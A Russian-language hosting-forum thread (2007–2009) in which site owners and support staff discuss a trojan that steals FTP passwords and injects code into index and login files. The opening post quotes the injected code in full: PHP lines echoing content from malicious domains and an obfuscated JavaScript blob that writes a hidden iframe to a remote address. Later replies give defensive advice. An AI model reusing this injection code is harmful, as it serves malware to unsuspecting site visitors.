FreeHost.com.UA
Января 22, 2018, 09:33:39 am *
Добро пожаловать, Гость. Пожалуйста, войдите или зарегистрируйтесь.

Войти
Новости: Распродажа серверов http://freehost.com.ua/forum/index.php?topic=2093.0
 
   Начало   Помощь Поиск Войти Регистрация  
Страниц: [1] 2
  Печать  
Автор Тема: Внимание ходит ТРОЯН  (Прочитано 24983 раз)
jeux
Newbie
*

Karma: 0
Сообщений: 1


Просмотр профиля E-mail
« : Октября 21, 2007, 12:02:02 pm »

Код:
<?php
echo file_get_contents("http://erordmas.info/test.txt");
?>
<?php
echo file_get_contents("http://erordmas.info/test.txt");
?>
<?php
echo file_get_contents("http://erordmas.info/test.txt");
?>
<?php
echo file_get_contents("http://erordmas.info/test.txt");
?>
<?php
echo file_get_contents("http://erordmas.info/test.txt");
?>
<?php
echo file_get_contents("http://erordmas.info/test.txt");
?>
<?php
echo file_get_contents("http://erordmas.info/test.txt");
?>
<?php
echo file_get_contents("http://erordmas.info/test.txt");
?>
<?php
echo file_get_contents("http://doubler2007.com/test.txt");
?>
<?php
echo file_get_contents("http://www.gerbalaif.info/tests.txt");
?>
<?php
echo file_get_contents("http://doubler2007.com/test.txt");
?>
<?php
echo file_get_contents("http://doubler2007.com/test.txt");
?>
<?php
echo file_get_contents("http://doubler2007.com/test.txt");
?>
<?php
echo file_get_contents("http://doubler2007.com/test.txt");
?>
<?php
echo file_get_contents("http://doubler2007.com/test.txt");
?>
Код:
<!-- o65 --><script language="JavaScript">eval(unescape("document.write%28String.fromCharCode%2860%2C105%2C102%2C114%2C97%2C109%2C101%2C32%2C98%2C111%2C114%2C100%2C101%2C114%2C61%2C34%2C48%2C34%2C32%2C115%2C116%2C121%2C108%2C101%2C61%2C34%2C100%2C105%2C115%2C112%2C108%2C97%2C121%2C58%2C32%2C110%2C111%2C110%2C101%2C59%2C34%2C32%2C119%2C105%2C100%2C116%2C104%2C61%2C34%2C48%2C34%2C32%2C115%2C114%2C99%2C61%2C34%2C104%2C116%2C116%2C112%2C58%2C47%2C47%2C48%2C49%2C50%2C49%2C46%2C48%2C49%2C51%2C55%2C46%2C48%2C50%2C50%2C53%2C46%2C48%2C49%2C52%2C54%2C47%2C37%2C51%2C48%2C37%2C51%2C49%2C37%2C54%2C67%2C37%2C54%2C55%2C37%2C52%2C51%2C37%2C54%2C53%2C37%2C54%2C65%2C37%2C54%2C69%2C47%2C37%2C54%2C70%2C37%2C55%2C53%2C37%2C55%2C52%2C37%2C50%2C69%2C37%2C54%2C56%2C37%2C55%2C52%2C37%2C54%2C68%2C37%2C54%2C67%2C34%2C62%2C60%2C47%2C105%2C102%2C114%2C97%2C109%2C101%2C62%29%29%3B"));</script><!-- c65 -->

Данный вредоносоный код поразил такие файлы на моем сайте:
index.php
login.php
index.html
index.htm

Во всех папках.
Внесение вредносного кода происходит путе доступа через FTP.Угроза исходит от машины на которой хранятся учетные записи с паролями и производится доступ через ФТП к сайту(пр этом пароли не обезательно могут хранится).
Возможные пути заражения:
1.Через заход IE на инфицированые Ресурсы.
2.Через ТОТАЛ командер - не знаю как.
Антивирусы в болшенстве не находят Троян.Но у меня нашел в КЕШЕ докторо Веб скрипт какой-то.

Зражение по логам происходило с таких IP:
203.121.67.117
81.95.152.16


Сейчас походу - это эпидемия.Как с ним бороться не знаю.Возможно даже он буфер собирате.Советую сменить пароли на ФТП и пока с зараженной машины ими не пользоваться.И решать проблему с вирусом на машинке.


Записан
Серёга
Newbie
*

Karma: -1
Сообщений: 22


FreeHost.com.ua ФАН!


Просмотр профиля E-mail
« Ответ #1 : Ноября 26, 2007, 04:10:45 pm »

так он заражает компы,или просто дописывает свой код в сайт?
Записан

setevoй_червь™
Тех. поддержка
Newbie
*

Karma: 2
Сообщений: 39


294335977
Просмотр профиля E-mail
« Ответ #2 : Декабря 19, 2007, 10:18:41 pm »

Сначала троянец проникает с другого зараженного сайта ,на который вы заходили, и подгружает другого трояна - downloader-а, который в свою очередь загружает ещё несколько, и среди них - троян который собственно и ворует вашу конфедициальную информацию, в данном случае - логин и пароль ФТП-доступа. После этого, под вашими данными доступа он подключается к серверу, и вносит зловредные изменения, при чем они могут нескольких видов - от просто порчи/частичного стирания кода, до просто внесения вышеприведенного примера кода.

Меры безопасности, для защиты от него стандартные - устанавливайте антивирус и фаервол, старайтесь не хранить конфедициальных данных на компьютере, не заходите с чужих компьютеров, не пользуйтесь услугами интернет-кафе.
« Последнее редактирование: Сентября 11, 2008, 07:28:47 am от setevoy » Записан

С уважением, служба технической поддержки, Зинченко Арсений.
mailto:support@freehost.com.ua
FREEhost.com.ua
ICQ: 294335977
Служба поддержки: 8(044)451-5342
Финансовый отдел: 8(044)227-1484
Nick
Newbie
*

Karma: 0
Сообщений: 2


Просмотр профиля
« Ответ #3 : Марта 25, 2008, 12:08:59 pm »

Что-то не вяжется. Доступ к сайту через ФТП есть всего у 2-х машин. Обе - чистые. Более того, на ВСЕ файлы в корне установлены права r-xr--r-- , но эта зараза всё равно умудряется дописать себя.. ХТТП логи чисты, там нет криминала.

Где и как увидеть логи доступа к сайту?


Спасибо.
Записан
setevoй_червь™
Тех. поддержка
Newbie
*

Karma: 2
Сообщений: 39


294335977
Просмотр профиля E-mail
« Ответ #4 : Марта 25, 2008, 09:05:10 pm »

Для получения логов - напишите запрос с контактного имейла аккаунта.

А самое главное - если такое случилось, то смените пароли ФТП-пользователям. Сделать это можно в админпанели в разделе ФТП-пользователи, нажав справа от логина пользователя иконку Редактировать.
Записан

С уважением, служба технической поддержки, Зинченко Арсений.
mailto:support@freehost.com.ua
FREEhost.com.ua
ICQ: 294335977
Служба поддержки: 8(044)451-5342
Финансовый отдел: 8(044)227-1484
Nick
Newbie
*

Karma: 0
Сообщений: 2


Просмотр профиля
« Ответ #5 : Марта 25, 2008, 09:13:09 pm »

ФТП пароли сменил сразу. На одной машине рекомендованый тут антивирус нашёл несколько троянов (хотя NOD32 в упор молчал)
Будем посмотреть, возможно, проблема локализована и устранена..
Записан
aprel
Member
*****

Karma: 1
Сообщений: 470


aprel


Просмотр профиля WWW
« Ответ #6 : Июня 11, 2008, 01:48:32 am »

Не храните пароли от ФТП-аккаунтов в ФТП-клиентах.
Каждый нормальный ФТП-клиент предупредит вас строчкой перед строкой ввода пароля, что хранить здесь пароль небезопасно.
Записан

Бывший саппортер
Проблема: пишет ошибку "Выбрана неверная папка". Что делать? -- Решение:очевидно - обратить папку в свою веру.

Dwar'юсь
мережевий хробачок™
Sr. Member
****

Karma: 3
Сообщений: 309



Просмотр профиля
« Ответ #7 : Августа 12, 2008, 09:57:33 am »

Вот нашел интересную ссылочку:
http://www.securitylab.ru/forum/forum16/topic46619/messages/#message376065
Записан
hardlock
Newbie
*

Karma: 0
Сообщений: 3



Просмотр профиля WWW
« Ответ #8 : Сентября 22, 2008, 01:29:51 pm »

Здравствуйте!

значит ситуация такая.
- ставлю чистую винду (ради эксперимента) WinXP SP3 + касперского 7.
-подключаюсь к сети и обновляю касперского.
- меняю пароль на ФТП
- заливаю через WEB-интерфейс ZIP архив и индексными страничками, он там распаковывается.
- Проверяю странички - всё нормально.
- ОПЯТЬ МЕНЯЮ ПАРОЛЬ на новый (генерю кнопкой). Его помню только я (нигде не сохраняю).
- Через 12 часов индексы опять заменены! КАК?

Мне кажется что это проблема не в моей машине...
« Последнее редактирование: Сентября 22, 2008, 01:31:26 pm от hardlock » Записан
PC_DOS
Full Member
***

Karma: -3
Сообщений: 117


324620
Просмотр профиля WWW
« Ответ #9 : Сентября 22, 2008, 02:16:53 pm »

Значит ктото имеет к тебе доступ из вне,так как за 12 часов можно не только опять же хакнуть машину,а снести все пароли и файлы(Может каспер крякнутый виром стоит).Каспер обходится очень легко и злоумышленник получает полноценный доступ к компу.Если у тебя пару локальных дисков форматни все,если есть программы вроде TeamViewer удаляй.Закрой удаленное пользование,поставь фаервол или закрой порты 139,135,найди нормальный антивир,поставь анти бэкхеды и кейгены.А еще лучше узнай у провайдера у кого из сети есть такой же ИП,если что купи белый,ставь защиту и радуйся.Никто не может сделать с твоим сайтом такое,если ты не внимательно все сделал,а лучше проверь сам сайт нет ли в нем еще какихто вредоносных кодов,если используешь платформу Dle,то можеш поставить антивирЪ.Админам оно надо?Саппорту оно надо?Это все зависит от тебя и только.Храни пароли не на компе а в голове или запиши на кусок бумаги и не сохраняй их в браузере,пока не найдешь гада или закроешь все доступы из внутри.Не используй акк с кем то еще на стороне.Следи за своими лучшими друзьями. Большое количество аккаунтов теряются именно таким путем.Само собой, не принимай и не открывай неизвестные файлы от незнакомых людей.
« Последнее редактирование: Сентября 22, 2008, 02:27:55 pm от Subscriber » Записан

http://xe-xe.org.ua -WareZz для всех
http://ua-ix.ru -Весь юмор инета
unknown php developer
Sr. Member
****

Karma: 4
Сообщений: 354



Просмотр профиля WWW
« Ответ #10 : Марта 12, 2009, 05:50:28 pm »

Linux - таблетка от всего.
Записан

Kartinamirainfo
Newbie
*

Karma: 0
Сообщений: 1


Просмотр профиля
« Ответ #11 : Мая 04, 2009, 12:01:22 am »

1 - Рекомендуемый антивирус Авира(Тех. поддержка компании рекомендует антивирус
http://dl5.avgate.net/down/windows/antivir_workstation_win7u_en_h.exe С большинством троянов этой серии справляется отлично.) полечил некоторые трояны, но глюк остался.
2 - Проверил я файлы на сервере (в фаре посмотрел аштимэлины) - оказалось что они нормальные, без левого скрипта. Выяснил, что скрипт вставляют браузеры (Мозилла, ИЕ) в сохранённые страницы.
3 - Семантек Нортон Антивирус 2009 сразу вылечил обсуждаемый троян, он был в дллене Дримвивера.
4 - Позднее при полном скане Нортон Антивирус 2009 нашёл троян в инсталляхе Дримвивера, а точнее в файле генерации ключа для русской версии 8.0.

Или описанный мной случай той же категории что и обсуждаемый здесь. Или другой. Если да - супер. Если нет - успехов всем!
Записан
unknown php developer
Sr. Member
****

Karma: 4
Сообщений: 354



Просмотр профиля WWW
« Ответ #12 : Мая 04, 2009, 02:22:07 am »

А тем временем линуксоиды вообще не знают что такое антивирусы и зачем они  Смеющийся
Записан

AMBA
Hero Member
*****

Karma: 2
Сообщений: 955



Просмотр профиля E-mail
« Ответ #13 : Мая 04, 2009, 03:57:59 am »

Это точно, ибо если уж их ломают, то никакой антивирь не поможет  Крутой
Записан
..::Guooff::..
Newbie
*

Karma: 0
Сообщений: 2


Просмотр профиля
« Ответ #14 : Мая 31, 2009, 11:12:17 pm »

у меня тоже такая же проблема вроде справился...., вот теперь жду когда google обновит свои данные и моём сайт, следовательно пропадёт это окно


а вообще вирусы у меня в основном в index файлах и в файлах кмпонентов и самого движка (joomla 1.5)
Вот так они выглядели





но а жду этой повторной диагностики от google`a уже 2ю неделю даже чуть больше)))) кто ни будь не подскажет ли как ускорить это время ожидания, а то постояльце (большая часть) зная что это ложное окно предупреждения но всё же обходят стороной....
Записан
Страниц: [1] 2
  Печать  
 
Перейти в:  

Powered by MySQL Powered by PHP Powered by SMF 1.1.16 | SMF © 2006-2011, Simple Machines Valid XHTML 1.0! Valid CSS!